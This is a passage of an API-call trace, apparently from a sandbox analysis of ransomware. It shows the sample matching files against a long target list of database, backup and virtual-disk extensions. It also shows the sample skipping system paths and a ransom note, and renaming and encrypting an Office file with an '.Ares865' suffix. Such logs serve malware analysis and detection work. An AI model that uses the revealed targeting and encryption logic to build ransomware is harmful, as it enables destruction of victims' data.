[0088.228] lstrlenW (lpString="eco") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="eco") returned -1 [0088.228] lstrlenW (lpString="ecx") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="ecx") returned -1 [0088.228] lstrlenW (lpString="edb") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="edb") returned -1 [0088.228] lstrlenW (lpString="epim") returned 4 [0088.228] lstrcmpiW (lpString1="_dll", lpString2="epim") returned -1 [0088.228] lstrlenW (lpString="fcd") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="fcd") returned -1 [0088.228] lstrlenW (lpString="fdb") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="fdb") returned -1 [0088.228] lstrlenW (lpString="fic") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="fic") returned -1 [0088.228] lstrlenW (lpString="flexolibrary") returned 12 [0088.228] lstrcmpiW (lpString1=".DLL.trx_dll", lpString2="flexolibrary") returned -1 [0088.228] lstrlenW (lpString="fm5") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="fm5") returned -1 [0088.228] lstrlenW (lpString="fmp") returned 3 [0088.228] lstrcmpiW (lpString1="dll", lpString2="fmp") returned -1 [0088.229] lstrlenW (lpString="fmp12") returned 5 [0088.229] lstrcmpiW (lpString1="x_dll", lpString2="fmp12") returned 1 [0088.229] lstrlenW (lpString="fmpsl") returned 5 [0088.229] lstrcmpiW (lpString1="x_dll", lpString2="fmpsl") returned 1 [0088.229] lstrlenW (lpString="fol") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fol") returned -1 [0088.229] lstrlenW (lpString="fp3") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fp3") returned -1 [0088.229] lstrlenW (lpString="fp4") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fp4") returned -1 [0088.229] lstrlenW (lpString="fp5") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fp5") returned -1 [0088.229] lstrlenW (lpString="fp7") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fp7") returned -1 [0088.229] lstrlenW (lpString="fpt") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="fpt") returned -1 [0088.229] lstrlenW (lpString="frm") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="frm") returned -1 [0088.229] lstrlenW (lpString="gdb") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.229] lstrlenW (lpString="gdb") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="gdb") returned -1 [0088.229] lstrlenW (lpString="grdb") returned 4 [0088.229] lstrcmpiW (lpString1="_dll", lpString2="grdb") returned -1 [0088.229] lstrlenW (lpString="gwi") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="gwi") returned -1 [0088.229] lstrlenW (lpString="hdb") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="hdb") returned -1 [0088.229] lstrlenW (lpString="his") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="his") returned -1 [0088.229] lstrlenW (lpString="ib") returned 2 [0088.229] lstrcmpiW (lpString1="ll", lpString2="ib") returned 1 [0088.229] lstrlenW (lpString="idb") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="idb") returned -1 [0088.229] lstrlenW (lpString="ihx") returned 3 [0088.229] lstrcmpiW (lpString1="dll", lpString2="ihx") returned -1 [0088.229] lstrlenW (lpString="itdb") returned 4 [0088.229] lstrcmpiW (lpString1="_dll", lpString2="itdb") returned -1 [0088.230] lstrlenW (lpString="itw") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="itw") returned -1 [0088.230] lstrlenW (lpString="jet") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="jet") returned -1 [0088.230] lstrlenW (lpString="jtx") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="jtx") returned -1 [0088.230] lstrlenW (lpString="kdb") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="kdb") returned -1 [0088.230] lstrlenW (lpString="kexi") returned 4 [0088.230] lstrcmpiW (lpString1="_dll", lpString2="kexi") returned -1 [0088.230] lstrlenW (lpString="kexic") returned 5 [0088.230] lstrcmpiW (lpString1="x_dll", lpString2="kexic") returned 1 [0088.230] lstrlenW (lpString="kexis") returned 5 [0088.230] lstrcmpiW (lpString1="x_dll", lpString2="kexis") returned 1 [0088.230] lstrlenW (lpString="lgc") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="lgc") returned -1 [0088.230] lstrlenW (lpString="lwx") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="lwx") returned -1 [0088.230] lstrlenW (lpString="maf") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="maf") returned -1 [0088.230] lstrlenW (lpString="maq") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="maq") returned -1 [0088.230] lstrlenW (lpString="mar") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="mar") returned -1 [0088.230] lstrlenW (lpString="marshal") returned 7 [0088.230] lstrcmpiW (lpString1="trx_dll", lpString2="marshal") returned 1 [0088.230] lstrlenW (lpString="mas") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="mas") returned -1 [0088.230] lstrlenW (lpString="mav") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="mav") returned -1 [0088.230] lstrlenW (lpString="maw") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="maw") returned -1 [0088.230] lstrlenW (lpString="mdbhtml") returned 7 [0088.230] lstrcmpiW (lpString1="trx_dll", lpString2="mdbhtml") returned 1 [0088.230] lstrlenW (lpString="mdn") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="mdn") returned -1 [0088.230] lstrlenW (lpString="mdt") returned 3 [0088.230] lstrcmpiW (lpString1="dll", lpString2="mdt") returned -1 [0088.231] lstrlenW (lpString="mfd") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="mfd") returned -1 [0088.231] lstrlenW (lpString="mpd") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="mpd") returned -1 [0088.231] lstrlenW (lpString="mrg") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="mrg") returned -1 [0088.231] lstrlenW (lpString="mud") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="mud") returned -1 [0088.231] lstrlenW (lpString="mwb") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="mwb") returned -1 [0088.231] lstrlenW (lpString="myd") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="myd") returned -1 [0088.231] lstrlenW (lpString="ndf") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="ndf") returned -1 [0088.231] lstrlenW (lpString="nnt") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="nnt") returned -1 [0088.231] lstrlenW (lpString="nrmlib") returned 6 [0088.231] lstrcmpiW (lpString1="rx_dll", lpString2="nrmlib") returned 1 [0088.231] lstrlenW (lpString="ns2") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="ns2") returned -1 [0088.231] lstrlenW (lpString="ns3") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="ns3") returned -1 [0088.231] lstrlenW (lpString="ns4") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="ns4") returned -1 [0088.231] lstrlenW (lpString="nsf") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="nsf") returned -1 [0088.231] lstrlenW (lpString="nv") returned 2 [0088.231] lstrcmpiW (lpString1="ll", lpString2="nv") returned -1 [0088.231] lstrlenW (lpString="nv2") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="nv2") returned -1 [0088.231] lstrlenW (lpString="nwdb") returned 4 [0088.231] lstrcmpiW (lpString1="_dll", lpString2="nwdb") returned -1 [0088.231] lstrlenW (lpString="nyf") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="nyf") returned -1 [0088.231] lstrlenW (lpString="odb") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.231] lstrlenW (lpString="odb") returned 3 [0088.231] lstrcmpiW (lpString1="dll", lpString2="odb") returned -1 [0088.231] lstrlenW (lpString="oqy") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="oqy") returned -1 [0088.232] lstrlenW (lpString="ora") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="ora") returned -1 [0088.232] lstrlenW (lpString="orx") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="orx") returned -1 [0088.232] lstrlenW (lpString="owc") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="owc") returned -1 [0088.232] lstrlenW (lpString="p96") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="p96") returned -1 [0088.232] lstrlenW (lpString="p97") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="p97") returned -1 [0088.232] lstrlenW (lpString="pan") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="pan") returned -1 [0088.232] lstrlenW (lpString="pdb") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="pdb") returned -1 [0088.232] lstrlenW (lpString="pdm") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="pdm") returned -1 [0088.232] lstrlenW (lpString="pnz") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="pnz") returned -1 [0088.232] lstrlenW (lpString="qry") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="qry") returned -1 [0088.232] lstrlenW (lpString="qvd") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="qvd") returned -1 [0088.232] lstrlenW (lpString="rbf") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="rbf") returned -1 [0088.232] lstrlenW (lpString="rctd") returned 4 [0088.232] lstrcmpiW (lpString1="_dll", lpString2="rctd") returned -1 [0088.232] lstrlenW (lpString="rod") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="rod") returned -1 [0088.232] lstrlenW (lpString="rodx") returned 4 [0088.232] lstrcmpiW (lpString1="_dll", lpString2="rodx") returned -1 [0088.232] lstrlenW (lpString="rpd") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="rpd") returned -1 [0088.232] lstrlenW (lpString="rsd") returned 3 [0088.232] lstrcmpiW (lpString1="dll", lpString2="rsd") returned -1 [0088.232] lstrlenW (lpString="sas7bdat") returned 8 [0088.232] lstrcmpiW (lpString1=".trx_dll", lpString2="sas7bdat") returned -1 [0088.232] lstrlenW (lpString="sbf") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="sbf") returned -1 [0088.233] lstrlenW (lpString="scx") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="scx") returned -1 [0088.233] lstrlenW (lpString="sdb") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="sdb") returned -1 [0088.233] lstrlenW (lpString="sdc") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="sdc") returned -1 [0088.233] lstrlenW (lpString="sdf") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="sdf") returned -1 [0088.233] lstrlenW (lpString="sis") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="sis") returned -1 [0088.233] lstrlenW (lpString="spq") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="spq") returned -1 [0088.233] lstrlenW (lpString="te") returned 2 [0088.233] lstrcmpiW (lpString1="ll", lpString2="te") returned -1 [0088.233] lstrlenW (lpString="teacher") returned 7 [0088.233] lstrcmpiW (lpString1="trx_dll", lpString2="teacher") returned 1 [0088.233] lstrlenW (lpString="tmd") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="tmd") returned -1 [0088.233] lstrlenW (lpString="tps") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="tps") returned -1 [0088.233] lstrlenW (lpString="trc") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.233] lstrlenW (lpString="trc") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="trc") returned -1 [0088.233] lstrlenW (lpString="trm") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="trm") returned -1 [0088.233] lstrlenW (lpString="udb") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="udb") returned -1 [0088.233] lstrlenW (lpString="udl") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="udl") returned -1 [0088.233] lstrlenW (lpString="usr") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="usr") returned -1 [0088.233] lstrlenW (lpString="v12") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="v12") returned -1 [0088.233] lstrlenW (lpString="vis") returned 3 [0088.233] lstrcmpiW (lpString1="dll", lpString2="vis") returned -1 [0088.233] lstrlenW (lpString="vpd") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="vpd") returned -1 [0088.234] lstrlenW (lpString="vvv") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="vvv") returned -1 [0088.234] lstrlenW (lpString="wdb") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="wdb") returned -1 [0088.234] lstrlenW (lpString="wmdb") returned 4 [0088.234] lstrcmpiW (lpString1="_dll", lpString2="wmdb") returned -1 [0088.234] lstrlenW (lpString="wrk") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="wrk") returned -1 [0088.234] lstrlenW (lpString="xdb") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="xdb") returned -1 [0088.234] lstrlenW (lpString="xld") returned 3 [0088.234] lstrcmpiW (lpString1="dll", lpString2="xld") returned -1 [0088.234] lstrlenW (lpString="xmlff") returned 5 [0088.234] lstrcmpiW (lpString1="x_dll", lpString2="xmlff") returned -1 [0088.234] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.Ares865") returned 80 [0088.234] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.ares865"), dwFlags=0x1) returned 1 [0088.235] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.Ares865" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0088.235] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=107360) returned 1 [0088.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0088.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0088.236] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0088.236] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0088.236] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0088.236] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.237] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1a660, lpName=0x0) returned 0x15c [0088.238] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1a660) returned 0x190000 [0088.243] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0088.244] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0088.244] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0088.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0088.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0088.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0088.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0088.244] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0088.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0088.244] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0088.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0088.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0088.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0088.245] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0088.246] CloseHandle (hObject=0x15c) returned 1 [0088.246] CloseHandle (hObject=0x118) returned 1 [0088.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0088.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0088.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0088.247] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa27f6800, ftCreationTime.dwHighDateTime=0x1cac809, ftLastAccessTime.dwLowDateTime=0xef0320d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xa27f6800, ftLastWriteTime.dwHighDateTime=0x1cac809, nFileSizeHigh=0x0, nFileSizeLow=0x8e160, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PUB6INTL.REST.trx_dll", cAlternateFileName="PUB6IN~2.TRX")) returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="aoldtz.exe") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="..") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="windows") returned -1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="bootmgr") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="temp") returned -1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="pagefile.sys") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="boot") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ids.txt") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="ntuser.dat") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="perflogs") returned 1 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="MSBuild") returned 1 [0088.247] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0088.247] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0088.247] lstrcpyW (in: lpString1=0x2cce468, lpString2="PUB6INTL.REST.trx_dll" | out: lpString1="PUB6INTL.REST.trx_dll") returned="PUB6INTL.REST.trx_dll" [0088.247] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0088.247] lstrlenW (lpString="Ares865") returned 7 [0088.247] lstrcmpiW (lpString1="trx_dll", lpString2="Ares865") returned 1 [0088.247] lstrlenW (lpString=".dll") returned 4 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".dll") returned 1 [0088.247] lstrlenW (lpString=".lnk") returned 4 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".lnk") returned 1 [0088.247] lstrlenW (lpString=".ini") returned 4 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".ini") returned 1 [0088.247] lstrlenW (lpString=".sys") returned 4 [0088.247] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2=".sys") returned 1 [0088.247] lstrlenW (lpString="PUB6INTL.REST.trx_dll") returned 21 [0088.247] lstrlenW (lpString="bak") returned 3 [0088.247] lstrcmpiW (lpString1="dll", lpString2="bak") returned 1 [0088.247] lstrlenW (lpString="ba_") returned 3 [0088.247] lstrcmpiW (lpString1="dll", lpString2="ba_") returned 1 [0088.247] lstrlenW (lpString="dbb") returned 3 [0088.247] lstrcmpiW (lpString1="dll", lpString2="dbb") returned 1 [0088.247] lstrlenW (lpString="vmdk") returned 4 [0088.248] lstrcmpiW (lpString1="_dll", lpString2="vmdk") returned -1 [0088.248] lstrlenW (lpString="rar") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="rar") returned -1 [0088.248] lstrlenW (lpString="zip") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="zip") returned -1 [0088.248] lstrlenW (lpString="tgz") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="tgz") returned -1 [0088.248] lstrlenW (lpString="vbox") returned 4 [0088.248] lstrcmpiW (lpString1="_dll", lpString2="vbox") returned -1 [0088.248] lstrlenW (lpString="vdi") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="vdi") returned -1 [0088.248] lstrlenW (lpString="vhd") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="vhd") returned -1 [0088.248] lstrlenW (lpString="vhdx") returned 4 [0088.248] lstrcmpiW (lpString1="_dll", lpString2="vhdx") returned -1 [0088.248] lstrlenW (lpString="avhd") returned 4 [0088.248] lstrcmpiW (lpString1="_dll", lpString2="avhd") returned -1 [0088.248] lstrlenW (lpString="db") returned 2 [0088.248] lstrcmpiW (lpString1="ll", lpString2="db") returned 1 [0088.248] lstrlenW (lpString="db2") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="db2") returned 1 [0088.248] lstrlenW (lpString="db3") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="db3") returned 1 [0088.248] lstrlenW (lpString="dbf") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="dbf") returned 1 [0088.248] lstrlenW (lpString="mdf") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="mdf") returned -1 [0088.248] lstrlenW (lpString="mdb") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="mdb") returned -1 [0088.248] lstrlenW (lpString="sql") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="sql") returned -1 [0088.248] lstrlenW (lpString="sqlite") returned 6 [0088.248] lstrcmpiW (lpString1="rx_dll", lpString2="sqlite") returned -1 [0088.248] lstrlenW (lpString="sqlite3") returned 7 [0088.248] lstrcmpiW (lpString1="trx_dll", lpString2="sqlite3") returned 1 [0088.248] lstrlenW (lpString="sqlitedb") returned 8 [0088.248] lstrcmpiW (lpString1=".trx_dll", lpString2="sqlitedb") returned -1 [0088.248] lstrlenW (lpString="xml") returned 3 [0088.248] lstrcmpiW (lpString1="dll", lpString2="xml") returned -1 [0088.249] lstrlenW (lpString="$er") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="$er") returned 1 [0088.249] lstrlenW (lpString="4dd") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="4dd") returned 1 [0088.249] lstrlenW (lpString="4dl") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="4dl") returned 1 [0088.249] lstrlenW (lpString="^^^") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="^^^") returned 1 [0088.249] lstrlenW (lpString="abs") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="abs") returned 1 [0088.249] lstrlenW (lpString="abx") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="abx") returned 1 [0088.249] lstrlenW (lpString="accdb") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accdb") returned 1 [0088.249] lstrlenW (lpString="accdc") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accdc") returned 1 [0088.249] lstrlenW (lpString="accde") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accde") returned 1 [0088.249] lstrlenW (lpString="accdr") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accdr") returned 1 [0088.249] lstrlenW (lpString="accdt") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accdt") returned 1 [0088.249] lstrlenW (lpString="accdw") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accdw") returned 1 [0088.249] lstrlenW (lpString="accft") returned 5 [0088.249] lstrcmpiW (lpString1="x_dll", lpString2="accft") returned 1 [0088.249] lstrlenW (lpString="adb") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.249] lstrlenW (lpString="adb") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="adb") returned 1 [0088.249] lstrlenW (lpString="ade") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="ade") returned 1 [0088.249] lstrlenW (lpString="adf") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="adf") returned 1 [0088.249] lstrlenW (lpString="adn") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="adn") returned 1 [0088.249] lstrlenW (lpString="adp") returned 3 [0088.249] lstrcmpiW (lpString1="dll", lpString2="adp") returned 1 [0088.250] lstrlenW (lpString="alf") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="alf") returned 1 [0088.250] lstrlenW (lpString="ask") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="ask") returned 1 [0088.250] lstrlenW (lpString="btr") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="btr") returned 1 [0088.250] lstrlenW (lpString="cat") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="cat") returned 1 [0088.250] lstrlenW (lpString="cdb") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="cdb") returned 1 [0088.250] lstrlenW (lpString="ckp") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="ckp") returned 1 [0088.250] lstrlenW (lpString="cma") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="cma") returned 1 [0088.250] lstrlenW (lpString="cpd") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="cpd") returned 1 [0088.250] lstrlenW (lpString="dacpac") returned 6 [0088.250] lstrcmpiW (lpString1="rx_dll", lpString2="dacpac") returned 1 [0088.250] lstrlenW (lpString="dad") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="dad") returned 1 [0088.250] lstrlenW (lpString="dadiagrams") returned 10 [0088.250] lstrcmpiW (lpString1="ST.trx_dll", lpString2="dadiagrams") returned 1 [0088.250] lstrlenW (lpString="daschema") returned 8 [0088.250] lstrcmpiW (lpString1=".trx_dll", lpString2="daschema") returned -1 [0088.250] lstrlenW (lpString="db-journal") returned 10 [0088.250] lstrcmpiW (lpString1="ST.trx_dll", lpString2="db-journal") returned 1 [0088.250] lstrlenW (lpString="db-shm") returned 6 [0088.250] lstrcmpiW (lpString1="rx_dll", lpString2="db-shm") returned 1 [0088.250] lstrlenW (lpString="db-wal") returned 6 [0088.250] lstrcmpiW (lpString1="rx_dll", lpString2="db-wal") returned 1 [0088.250] lstrlenW (lpString="dbc") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="dbc") returned 1 [0088.250] lstrlenW (lpString="dbs") returned 3 [0088.250] lstrcmpiW (lpString1="dll", lpString2="dbs") returned 1 [0088.250] lstrlenW (lpString="dbt") returned 3 [0088.250] 